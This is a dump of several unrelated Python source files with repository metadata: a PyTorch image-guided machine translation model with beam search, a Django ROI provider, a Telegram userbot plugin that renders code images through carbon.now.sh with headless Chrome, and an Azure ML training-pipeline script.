38095c4a5477a0e7e2fa1592e8401aa9cddf2beb
|
[
"Apache-2.0"
] | 1
|
2020-01-07T12:13:03.000Z
|
2020-01-30T10:45:00.000Z
|
machine_translation_vision/models/NMT_AttentionImagine_Seq2Seq_Beam_V10.py
|
Eurus-Holmes/VAG-NMT
|
38095c4a5477a0e7e2fa1592e8401aa9cddf2beb
|
[
"Apache-2.0"
] | 3
|
2020-05-07T19:13:41.000Z
|
2021-02-19T11:26:00.000Z
|
#Implements a new Model where we project the stacked Hidden States from decoder to the Shared Space.
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
import math
import random
import sys
from ..layers import LIUMCVC_Encoder
from ..layers import NMT_Decoder_V2
from ..layers import VSE_Imagine
from ..utils.utils import l2norm
SOS_token = 2
EOS_token = 3
use_cuda = torch.cuda.is_available()
#Construct an Attention ImagineSeq2Seq Model
class NMT_AttentionImagine_Seq2Seq_Beam_V10(nn.Module):
def __init__(self, \
src_size, \
tgt_size, \
im_feats_size, \
src_embedding_size, \
tgt_embedding_size, \
hidden_size, \
shared_embedding_size, \
loss_w, \
beam_size=1, \
attn_model = 'dot', \
n_layers=1, \
dropout_ctx=0.0, \
dropout_emb=0.0, \
dropout_out=0.0, \
dropout_rnn_enc=0.0, \
dropout_rnn_dec=0.0, \
dropout_im_emb = 0.0, \
dropout_txt_emb = 0.0, \
activation_vse = True, \
tied_emb=False):
super(NMT_AttentionImagine_Seq2Seq_Beam_V10,self).__init__()
#Define all the parameters
self.src_size = src_size
self.tgt_size = tgt_size
self.im_feats_size = im_feats_size
self.src_embedding_size = src_embedding_size
self.tgt_embedding_size = tgt_embedding_size
self.hidden_size = hidden_size
self.n_layers = n_layers
self.shared_embedding_size = shared_embedding_size
self.beam_size = beam_size
self.loss_w = loss_w
self.tied_emb=tied_emb
self.dropout_im_emb = dropout_im_emb
self.dropout_txt_emb = dropout_txt_emb
self.activation_vse = activation_vse
self.attn_model = attn_model
#Define all the parts.
self.encoder = LIUMCVC_Encoder(src_size,src_embedding_size,hidden_size,n_layers,dropout_rnn=dropout_rnn_enc, dropout_ctx=dropout_ctx, dropout_emb=dropout_emb)
self.decoder = NMT_Decoder_V2(tgt_size,tgt_embedding_size,hidden_size,2*hidden_size,n_layers,dropout_rnn=dropout_rnn_dec,dropout_out=dropout_out,dropout_emb=0.0,tied_emb=tied_emb)
#self.decoder = NMT_Decoder_V2(tgt_size,tgt_embedding_size,hidden_size,2*hidden_size,n_layers,dropout_rnn=dropout_rnn_dec,dropout_out=dropout_out,dropout_emb=0.0,tied_emb=tied_emb)
#Initialize the VSE_Imagine Module
self.vse_imagine = VSE_Imagine(self.attn_model, self.im_feats_size, 2*self.hidden_size, self.shared_embedding_size, self.dropout_im_emb, self.dropout_txt_emb, self.activation_vse)
#Decoder Initialization Layer
self.decoderini = nn.Linear(2*hidden_size,hidden_size)
        #Initialize the layer weights (reset_parameters uses Kaiming normal init)
self.reset_parameters()
def reset_parameters(self):
for name, param in self.named_parameters():
if param.requires_grad and 'bias' not in name and param.data.dim() > 1:
nn.init.kaiming_normal(param.data)
def forward(self,src_var,src_lengths,tgt_var,im_var,teacher_force_ratio=1.0,max_length=80, criterion_mt=None, criterion_vse=None):
'''
Feed forward the input variable and compute the loss. tgt_var is always provided
Input:
src_var: The minibatch input sentence indexes representation with size (B*W_s)
            src_lengths: The list of lengths of each sentence in the minibatch, the size is (B)
            im_var: The minibatch of the paired image ResNet feature vectors, with the size (B*I), I is the image feature size.
            teacher_force_ratio: A scalar between 0 and 1 which defines the probability to conduct the teacher-forced training.
            tgt_var: The output sentence ground truth; if provided it will be used to help guide the training of the network. The size is (B*W_t).
            If not, it will just generate a target sentence which is shorter than max_length or stop when it finds an EOS tag.
max_length: A integer value that specifies the longest sentence that can be generated from this network.
Output:
loss: Total loss which is the sum of loss_mt and loss_vse
loss_mt: The loss for seq2seq machine translation
loss_vse: The loss for visual-text embedding space learning
'''
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = tgt_var.size()[1]
loss = 0
loss_mt = 0
loss_vse = 0
tgt_mask = (tgt_var != 0).float()
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
if tgt_var is not None:
tgt_mask = (tgt_var != 0).float()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
is_teacher = random.random() < teacher_force_ratio
if is_teacher:
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, ctx_mask=context_mask)
loss_n = criterion_mt(decoder_output,tgt_var[:,di])
loss_mt += loss_n
decoder_hiddens[di] = decoder_stacked_hidden
decoder_input = tgt_var[:,di]
else:
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs, ctx_mask=context_mask)
loss_n = criterion_mt(decoder_output,tgt_var[:,di])
loss_mt += loss_n
#Normalize The Text Embedding Vector
decoder_hiddens[di] = decoder_stacked_hidden
#text_embedding_sets[di] = text_embedding_di
_,top1 = decoder_output.data.topk(1)
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Average the machine translation loss
#loss_mt = loss_mt / tgt_l
loss_mt = (loss_mt / tgt_mask.sum(-1)).mean()
#Compute the VSE loss with VSE_Imagine Module
loss_vse = self.vse_imagine(im_var,decoder_hiddens,criterion_vse=criterion_vse)
loss = self.loss_w*loss_mt + (1-self.loss_w)*loss_vse
return loss,loss_mt,loss_vse
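    # Call sketch (added; shapes follow the docstring above and the variable
    # names are illustrative): with src_var of size (B, W_s), src_lengths a
    # list of length B, tgt_var of size (B, W_t) and im_var of size (B, I),
    #   loss, loss_mt, loss_vse = model(src_var, src_lengths, tgt_var, im_var,
    #                                   teacher_force_ratio=1.0,
    #                                   criterion_mt=criterion_mt,
    #                                   criterion_vse=criterion_vse)
    # where criterion_mt and criterion_vse are the loss modules supplied by
    # the training loop.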
def _validate_args(self,src_var,tgt_var,max_length):
batch_size = src_var.size()[0]
if tgt_var is None:
tgt_l = max_length
else:
tgt_l = tgt_var.size()[1]
return batch_size,tgt_l
def beamsearch_decode(self,src_var,src_lengths,beam_size=1,max_length=80,tgt_var=None):
#Initiliaize the tgt_l
tgt_l = max_length
if tgt_var is not None:
tgt_l = tgt_var.size()[1]
batch_size = src_var.size()[0]
self.tgt_l = tgt_l
self.final_sample = []
self.beam_size = beam_size
#Encode the Sentences.
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
if use_cuda:
decoder_input = decoder_input.cuda()
if beam_size == 1:
decoder_translation_list = []
for di in range(tgt_l):
decoder_output,decoder_hidden,_ = self.decoder(decoder_input, decoder_hidden, encoder_outputs,ctx_mask=context_mask)
_,top1 = decoder_output.data.topk(1)
#Append the current prediction to decoder_translation
decoder_translation_list.append(top1[:,0])
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Compute the translation_prediction
for b in range(batch_size):
current_list = []
for i in range(tgt_l):
current_translation_token = decoder_translation_list[i][b]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
self.final_sample.append(current_list)
if beam_size > 1:
self.final_sample = self.beamsearch(encoder_outputs,context_mask,decoder_input,decoder_hidden,beam_size,tgt_l)
return self.final_sample
def beamsearch(self,encoder_outputs,context_mask,decoder_input,decoder_hidden,beam_size,max_length,avoid_double=True,avoid_unk=False):
#Define Batch_Size
batch_size = encoder_outputs.size(1)
n_vocab = self.tgt_size
#Define Mask to apply to pdxs.view(-1) to fix indices
nk_mask = torch.arange(batch_size*beam_size).long() #[0:batch_size*beam_size]
if use_cuda:
nk_mask = nk_mask.cuda()
pdxs_mask = (nk_mask/beam_size)*beam_size
#Tile indices to use in the loop to expand first dim
tile = nk_mask / beam_size
#Define the beam
beam = torch.zeros((max_length, batch_size, beam_size)).long()
if use_cuda:
beam = beam.cuda()
#Create encoder outptus,context_mask with batch_dimension = batch_size*beam_size
encoder_outputs_di = encoder_outputs[:,tile,:]
context_mask_di = context_mask[:,tile]
        #Define a large negative value to use as -inf when masking scores
inf = -1e5
for di in range(max_length):
if di == 0:
decoder_output,decoder_hidden,_ = self.decoder(decoder_input,decoder_hidden,encoder_outputs,ctx_mask=context_mask)
nll,topk = decoder_output.data.topk(k=beam_size,sorted=False) #nll and topk have the shape [batch,topk]
beam[0] = topk
else:
cur_tokens = beam[di-1].view(-1) #Get the input tokens to the next step
fini_idxs = (cur_tokens == EOS_token).nonzero() #The index that checks whether the beam has terminated
n_fini = fini_idxs.numel() #Verify if all the beams are terminated
if n_fini == batch_size*beam_size:
break
                #Get the decoder input for the next iteration (batch_size*beam_size, 1)
decoder_input = Variable(cur_tokens,volatile=True)
decoder_hidden = decoder_hidden[:,tile,:] #This operation will create a decoder_hidden states with size [batch_size*beam_size,H]
decoder_output,decoder_hidden,_ = self.decoder(decoder_input, decoder_hidden,encoder_outputs_di, ctx_mask=context_mask_di)
decoder_output = decoder_output.data
#Suppress probabilities of previous tokens at current time step, which avoids generating repeated word.
if avoid_double:
decoder_output.view(-1).index_fill_(0,cur_tokens+(nk_mask*n_vocab),inf)
#Suppress probabilities of unk word.
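                # NOTE (added): UNK_token is not defined in this module; it
                # must be defined alongside SOS_token/EOS_token for
                # avoid_unk=True to work.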
if avoid_unk:
decoder_output[:,UNK_token] = inf
"""
Favor finished hyps to generate <eos> again
Their nll scores will not increase further and they will always be kept in the beam.
This operation assures the future generation for those finished hypes will always pick EOS_token.
"""
if n_fini > 0:
fidxs = fini_idxs[:,0]
decoder_output.index_fill_(0,fidxs,inf)
decoder_output.view(-1).index_fill_(0,fidxs*self.tgt_size+EOS_token,0)
#Update the current score
nll = (nll.unsqueeze(2) + decoder_output.view(batch_size,-1,n_vocab)).view(batch_size,-1) #Size is [batch,beam*n_vocab]
#Pick the top beam_size best scores
nll,idxs = nll.topk(beam_size,sorted=False) #nll, idxs have the size [batch_size,beam_size]
#previous indices into the beam and current token indices
pdxs = idxs / n_vocab #size is [batch_size,beam_size]
#Update the previous token in beam[di]
beam[di] = idxs % n_vocab
# Permute all hypothesis history according to new order
beam[:di] = beam[:di].gather(2,pdxs.repeat(di,1,1))
# Compute correct previous indices
#Mask is nedded since we are in flatten regime
tile = pdxs.view(-1) + pdxs_mask
#Put an explicit <eos> to ensure that every sentence end in the end
beam[max_length-1] = EOS_token
#Find lengths by summing tokens not in (pad,bos,eos)
lens = (beam.transpose(0,2) > 3).sum(-1).t().float().clamp(min=1)
#Normalize Scores by length
nll /= lens.float()
top_hyps = nll.topk(1, sorted=False)[1].squeeze(1)
#Get best hyp for each sample in the batch
hyps = beam[:,range(batch_size),top_hyps].cpu().numpy().T
final_sample = []
for b in range(batch_size):
current_list = []
for i in range(max_length):
current_translation_token = hyps[b][i]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
final_sample.append(current_list)
return final_sample
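    # Illustration (added): final_sample is a list of length batch_size; each
    # element is the best hypothesis as a list of target-vocabulary indices
    # with the trailing EOS_token removed, e.g. [[5, 42, 7], [12, 9]]
    # (hypothetical indices).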
###########################Function Defined Below is for Image Retrieval##############
def embed_sent_im_eval(self,src_var,src_lengths,tgt_var,im_feats):
"""
Embed the Target Sentences to the shared space
Input:
source_sent: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_sent: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
txt_embedding.data: The embedded sentence tensor with size (B, SD), SD is the dimension of shared embedding
space.
im_embedding.data: The embedded image tensor with size (B, SD), SD is the dimension of the shared embedding space
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = tgt_var.size()[1]
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
#update text_embedding_sets
decoder_hiddens[di] = decoder_stacked_hidden
decoder_input = tgt_var[:,di]
im_embedding,text_embedding = self.vse_imagine.get_emb_vec(im_feats, decoder_hiddens)
#im_embedding = l2norm(im_embedding)
#I think may be another text_embedding here.
return im_embedding.data, text_embedding.data
def embed_sent_im_test(self,src_var,src_lengths,im_feats,max_length=80):
"""
Embed the Target Sentences to the shared space
Input:
source_sent: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_sent: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
txt_embedding.data: The embedded sentence tensor with size (B, SD), SD is the dimension of shared embedding
space.
im_embedding.data: The embedded image tensor with size (B, SD), SD is the dimension of the shared embedding space
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = max_length
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
decoder_hiddens[di] = decoder_stacked_hidden
#text_embedding_sets[di] = text_embedding_di
_,top1 = decoder_output.data.topk(1)
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Get the embedded vectors from vse_imagine
im_embedding,text_embedding = self.vse_imagine.get_emb_vec(im_feats, decoder_hiddens)
#I think may be another text_embedding here.
return im_embedding.data, text_embedding.data
########################################################################
def get_imagine_attention_eval(self,src_var,src_lengths,tgt_var,im_feats):
"""
Get the attention_weights for validation dataset when tgt_var is available.
Input:
source_var: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_var: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
output_translation: List of index for translations predicted by the seq2seq model
attention_weights: (B,T)
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = tgt_var.size()[1]
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
decoder_translation_list = []
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
#update text_embedding_sets
decoder_hiddens[di] = decoder_stacked_hidden
            #Update the translation list.
_,top1 = decoder_output.data.topk(1)
decoder_translation_list.append(top1[:,0])
#update the decoder_input for the next step
decoder_input = tgt_var[:,di]
#Get the attention weights
attn_weights = self.vse_imagine.get_imagine_weights(im_feats,decoder_hiddens)
        #Get the translation list
final_translations = []
for b in range(batch_size):
current_list = []
for i in range(tgt_l):
current_translation_token = decoder_translation_list[i][b]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
final_translations.append(current_list)
return attn_weights.data,final_translations
def get_imagine_attention_test(self,src_var,src_lengths,im_feats,max_length=80):
"""
        Get the attention_weights for the test dataset when tgt_var is not available.
Input:
source_var: The Source Sent Index Variable with size(B,W), W is just the length of the sentence
target_var: The Target Sent Index Variable with size(B,W) W is the length of the sentence
im_feats: The Image Features with size (B,D), D is the dimension of image feature.
Output:
output_translation: List of index for translations predicted by the seq2seq model
attention_weights: (B,T)
"""
#Define the batch_size and input_length
batch_size = src_var.size()[0]
tgt_l = max_length
#Update the self.tgt_l
self.tgt_l = tgt_l
#Encoder src_var
encoder_outputs,context_mask = self.encoder(src_var,src_lengths)
#Prepare the Input and Output Variables for Decoder
decoder_input = Variable(torch.LongTensor([[SOS_token] for x in range(batch_size)]))
#decoder_hidden = torch.mean(encoder_outputs,dim=0,keepdim=True)
decoder_hidden = F.tanh(self.decoderini(encoder_outputs.sum(0)/context_mask.sum(0).unsqueeze(1))).unsqueeze(0)
#Initialize the output
if use_cuda:
decoder_input = decoder_input.cuda()
decoder_hiddens = Variable(torch.zeros(tgt_l,batch_size,2*self.hidden_size))
if use_cuda:
decoder_hiddens = decoder_hiddens.cuda()
#Determine whether teacher forcing is used.
decoder_translation_list = []
for di in range(tgt_l):
decoder_output,decoder_hidden,decoder_stacked_hidden = self.decoder(decoder_input, decoder_hidden, encoder_outputs)
#update text_embedding_sets
decoder_hiddens[di] = decoder_stacked_hidden
            #Update the translation list.
_,top1 = decoder_output.data.topk(1)
decoder_translation_list.append(top1[:,0])
#update the decoder_input for the next step
decoder_input = Variable(top1)
if use_cuda:
decoder_input = decoder_input.cuda()
#Get the attention weights
attn_weights = self.vse_imagine.get_imagine_weights(im_feats,decoder_hiddens)
        #Get the translation list
final_translations = []
for b in range(batch_size):
current_list = []
for i in range(tgt_l):
current_translation_token = decoder_translation_list[i][b]
if current_translation_token == EOS_token:
break
current_list.append(current_translation_token)
final_translations.append(current_list)
return attn_weights.data,final_translations
| 44.609541
| 188
| 0.633768
|
24932860fce2a2298cd7875fad10db12ef2aab1a
| 1,344
|
py
|
Python
|
corefacility/roi/entity/rectangular_roi/rectangular_roi_provider.py
|
serik1987/corefacility
|
78d84e19403361e83ef562e738473849f9133bef
|
[
"RSA-MD"
] | null | null | null |
corefacility/roi/entity/rectangular_roi/rectangular_roi_provider.py
|
serik1987/corefacility
|
78d84e19403361e83ef562e738473849f9133bef
|
[
"RSA-MD"
] | null | null | null |
corefacility/roi/entity/rectangular_roi/rectangular_roi_provider.py
|
serik1987/corefacility
|
78d84e19403361e83ef562e738473849f9133bef
|
[
"RSA-MD"
] | null | null | null |
from core.entity.entity_providers.model_providers.model_provider import ModelProvider
from imaging.entity.map.map_provider import MapProvider
class RectangularRoiProvider(ModelProvider):
"""
Exchanges information between the Django model layer and the RectangularRoi entity.
"""
_entity_model = "roi.models.RectangularRoi"
_lookup_field = "id"
_model_fields = ["left", "right", "top", "bottom"]
_entity_class = "roi.entity.RectangularRoi"
_map_provider = MapProvider()
def unwrap_entity(self, rectangular_roi):
"""
Converts the RectangularRoi entity to the Django model. Such a model could be saved to the database.
:param rectangular_roi: the entity to be converted
:return: the Django model
"""
roi_model = super().unwrap_entity(rectangular_roi)
roi_model.map_id = rectangular_roi._map.id
return roi_model
def wrap_entity(self, external_object):
"""
Converts external object to the rectangular ROI entity
:param external_object: some object containing information loaded from the database
:return: the RectangularRoi instance
"""
rect_roi = super().wrap_entity(external_object)
rect_roi._map = self._map_provider.wrap_entity(external_object.map)
return rect_roi
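# --- Illustrative sketch (not part of the original module): how unwrap_entity and
# wrap_entity are meant to be paired. `rect_roi` is a hypothetical RectangularRoi
# entity already attached to a map; save() is the standard Django model call.
def _example_roundtrip(rect_roi):  # pragma: no cover
    provider = RectangularRoiProvider()
    roi_model = provider.unwrap_entity(rect_roi)   # Django model with map_id filled in
    roi_model.save()                               # persist through the Django ORM
    return provider.wrap_entity(roi_model)         # back to an entity with its map wrapped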
| 32
| 108
| 0.704613
|
fb0b0e74eff6cc09fb644379c76141501b2d86a5
| 2,881
|
py
|
Python
|
stdplugins/karbon3.py
|
sharath-git1/mybothubbot
|
1c78c0dfdf38ae7ae52d5fabdfadd69e184af66d
|
[
"Apache-2.0"
] | 1
|
2020-04-18T13:42:34.000Z
|
2020-04-18T13:42:34.000Z
|
stdplugins/karbon3.py
|
sharath-git1/mybothubbot
|
1c78c0dfdf38ae7ae52d5fabdfadd69e184af66d
|
[
"Apache-2.0"
] | 1
|
2021-02-08T20:44:42.000Z
|
2021-02-08T20:44:42.000Z
|
stdplugins/karbon3.py
|
hansari97/Tg-Bot
|
8fdf535c8df2c73d2ba762bc61464f106dc8f549
|
[
"Apache-2.0"
] | null | null | null |
"""Carbon Scraper Plugin for Userbot. //text in creative way.
usage: .kar3 //as a reply to any text message
Thanks to @r4v4n4 for vars"""
from selenium.webdriver.support.ui import Select
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
from telethon import events
from urllib.parse import quote_plus
from urllib.error import HTTPError
from time import sleep
import asyncio
import os
@borg.on(events.NewMessage(pattern=r"\.kar3", outgoing=True))
async def carbon_api(e):
if not e.text[0].isalpha() and e.text[0] not in ("/", "#", "@", "!"):
""" A Wrapper for carbon.now.sh """
await e.edit("🎛🎛🎛🎛🎛")
CARBON = 'https://carbon.now.sh/?bg=rgba(74%2C144%2C226%2C1)&t=material&wt=none&l=auto&ds=false&dsyoff=20px&dsblur=68px&wc=true&wa=true&pv=56px&ph=56px&ln=false&fl=1&fm=Fira%20Code&fs=14px&lh=152%25&si=false&es=2x&wm=false&code={code}'
CARBONLANG = "en"
textx = await e.get_reply_message()
pcode = e.text
        if pcode[6:]:
            pcode = str(pcode[6:])
elif textx:
pcode = str(textx.message) # Importing message to module
code = quote_plus(pcode) # Converting to urlencoded
url = CARBON.format(code=code, lang=CARBONLANG)
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.binary_location = Config.CARBON_BIN
chrome_options.add_argument("--window-size=1920x1080")
chrome_options.add_argument("--disable-dev-shm-usage")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument('--disable-gpu')
prefs = {'download.default_directory' : './'}
chrome_options.add_experimental_option('prefs', prefs)
await e.edit("🔵🔵🎛🎛🎛")
driver = webdriver.Chrome(executable_path=Config.CARBON_DRIVER, options=chrome_options)
driver.get(url)
download_path = './'
driver.command_executor._commands["send_command"] = ("POST", '/session/$sessionId/chromium/send_command')
params = {'cmd': 'Page.setDownloadBehavior', 'params': {'behavior': 'allow', 'downloadPath': download_path}}
command_result = driver.execute("send_command", params)
driver.find_element_by_xpath("//button[contains(text(),'Export')]").click()
sleep(5) # this might take a bit.
driver.find_element_by_xpath("//button[contains(text(),'4x')]").click()
sleep(5)
await e.edit("🔵🔵🔵🎛🎛")
driver.find_element_by_xpath("//button[contains(text(),'PNG')]").click()
sleep(5) #Waiting for downloading
await e.edit("🔵🔵🔵🔵🔵")
file = './carbon.png'
await e.edit("⬆️Karbon3 Completed, Uploading Karbon⬆️")
await e.client.send_file(
e.chat_id,
file,
caption="Karbon3 by [@PhycoNinja13b](https://github.com/Phyco-Ninja/UniNinja)",
force_document=True,
reply_to=e.message.reply_to_msg_id,
)
os.remove('./carbon.png')
# Removing carbon.png after uploading
await e.delete() # Deleting msg
| 40.577465
| 238
| 0.695939
|
f4f096759ff7faf205826e5b94fd8a4964d7c718
| 6,234
|
py
|
Python
|
ml_service/pipelines/titanic_build_train_pipeline.py
|
memasanz/02_MLOpsPython
|
23fa96a70a58ad6a25642b20486e94080a5ea580
|
[
"MIT"
] | 1
|
2022-03-28T17:31:02.000Z
|
2022-03-28T17:31:02.000Z
|
ml_service/pipelines/titanic_build_train_pipeline.py
|
memasanz/02_MLOpsPython
|
23fa96a70a58ad6a25642b20486e94080a5ea580
|
[
"MIT"
] | null | null | null |
ml_service/pipelines/titanic_build_train_pipeline.py
|
memasanz/02_MLOpsPython
|
23fa96a70a58ad6a25642b20486e94080a5ea580
|
[
"MIT"
] | null | null | null |
from azureml.pipeline.core.graph import PipelineParameter
from azureml.pipeline.steps import PythonScriptStep
from azureml.pipeline.core import Pipeline, PipelineData
from azureml.core import Workspace, Dataset, Datastore
from azureml.core.runconfig import RunConfiguration
from ml_service.pipelines.load_sample_data import create_sample_data_csv
from ml_service.util.attach_compute import get_compute
from ml_service.util.env_variables import Env
from ml_service.util.manage_environment import get_environment
import os
def main():
e = Env()
# Get Azure machine learning workspace
aml_workspace = Workspace.get(
name=e.workspace_name,
subscription_id=e.subscription_id,
resource_group=e.resource_group,
)
print("get_workspace:")
print(aml_workspace)
# Get Azure machine learning cluster
aml_compute = get_compute(aml_workspace, e.compute_name, e.vm_size)
if aml_compute is not None:
print("aml_compute:")
print(aml_compute)
# Create a reusable Azure ML environment
environment = get_environment(
aml_workspace,
e.aml_env_name,
conda_dependencies_file=e.aml_env_train_conda_dep_file,
create_new=e.rebuild_env,
    )
run_config = RunConfiguration()
run_config.environment = environment
if e.datastore_name:
datastore_name = e.datastore_name
else:
datastore_name = aml_workspace.get_default_datastore().name
run_config.environment.environment_variables[
"DATASTORE_NAME"
] = datastore_name # NOQA: E501
model_name_param = PipelineParameter(name="model_name", default_value=e.model_name) # NOQA: E501
dataset_version_param = PipelineParameter(
name="dataset_version", default_value=e.dataset_version
)
data_file_path_param = PipelineParameter(
name="data_file_path", default_value="none"
)
caller_run_id_param = PipelineParameter(name="caller_run_id", default_value="none") # NOQA: E501
# Get dataset name
dataset_name = e.dataset_name
# Check to see if dataset exists
if dataset_name not in aml_workspace.datasets:
# This call creates an example CSV from sklearn sample data. If you
# have already bootstrapped your project, you can comment this line
# out and use your own CSV.
create_sample_data_csv()
# Use a CSV to read in the data set.
file_name = "titanic.csv"
if not os.path.exists(file_name):
raise Exception(
'Could not find CSV dataset at "%s". If you have bootstrapped your project, you will need to provide a CSV.' # NOQA: E501
% file_name
) # NOQA: E501
# Upload file to default datastore in workspace
datatstore = Datastore.get(aml_workspace, datastore_name)
target_path = "training-data/"
datatstore.upload_files(
files=[file_name],
target_path=target_path,
overwrite=True,
show_progress=False,
)
# Register dataset
path_on_datastore = os.path.join(target_path, file_name)
dataset = Dataset.Tabular.from_delimited_files(
path=(datatstore, path_on_datastore)
)
dataset = dataset.register(
workspace=aml_workspace,
name=dataset_name,
description="titanic training data",
tags={"format": "CSV"},
create_new_version=True,
)
# Create a PipelineData to pass data between steps
pipeline_data = PipelineData(
"pipeline_data", datastore=aml_workspace.get_default_datastore()
)
train_step = PythonScriptStep(
name="Train Model",
script_name=e.train_script_path,
compute_target=aml_compute,
source_directory=e.sources_directory_train,
outputs=[pipeline_data],
arguments=[
"--model_name",
model_name_param,
"--step_output",
pipeline_data,
"--dataset_version",
dataset_version_param,
"--data_file_path",
data_file_path_param,
"--caller_run_id",
caller_run_id_param,
"--dataset_name",
dataset_name,
],
runconfig=run_config,
allow_reuse=True,
)
print("Step Train created")
evaluate_step = PythonScriptStep(
name="Evaluate Model ",
script_name=e.evaluate_script_path,
compute_target=aml_compute,
source_directory=e.sources_directory_train,
arguments=[
"--model_name",
model_name_param,
"--allow_run_cancel",
e.allow_run_cancel,
],
runconfig=run_config,
allow_reuse=False,
)
print("Step Evaluate created")
register_step = PythonScriptStep(
name="Register Model ",
script_name=e.register_script_path,
compute_target=aml_compute,
source_directory=e.sources_directory_train,
inputs=[pipeline_data],
arguments=["--model_name", model_name_param, "--step_input", pipeline_data, ], # NOQA: E501
runconfig=run_config,
allow_reuse=False,
)
print("Step Register created")
# Check run_evaluation flag to include or exclude evaluation step.
if (e.run_evaluation).lower() == "true":
print("Include evaluation step before register step.")
evaluate_step.run_after(train_step)
register_step.run_after(evaluate_step)
steps = [train_step, evaluate_step, register_step]
else:
print("Exclude evaluation step and directly run register step.")
register_step.run_after(train_step)
steps = [train_step, register_step]
train_pipeline = Pipeline(workspace=aml_workspace, steps=steps)
train_pipeline._set_experiment_name
train_pipeline.validate()
published_pipeline = train_pipeline.publish(
name=e.pipeline_name,
description="Model training/retraining pipeline",
version=e.build_id,
)
print(f"Published pipeline: {published_pipeline.name}")
print(f"for build {published_pipeline.version}")
if __name__ == "__main__":
main()
| 34.441989
| 138
| 0.665544
|
56a621c94f3ffef4d52910f2b0a75113269a1d83
| 1,119
|
py
|
Python
|
.tox/scenario/lib/python2.7/site-packages/testrepository/arguments/path.py
|
bdrich/neutron-lbaas
|
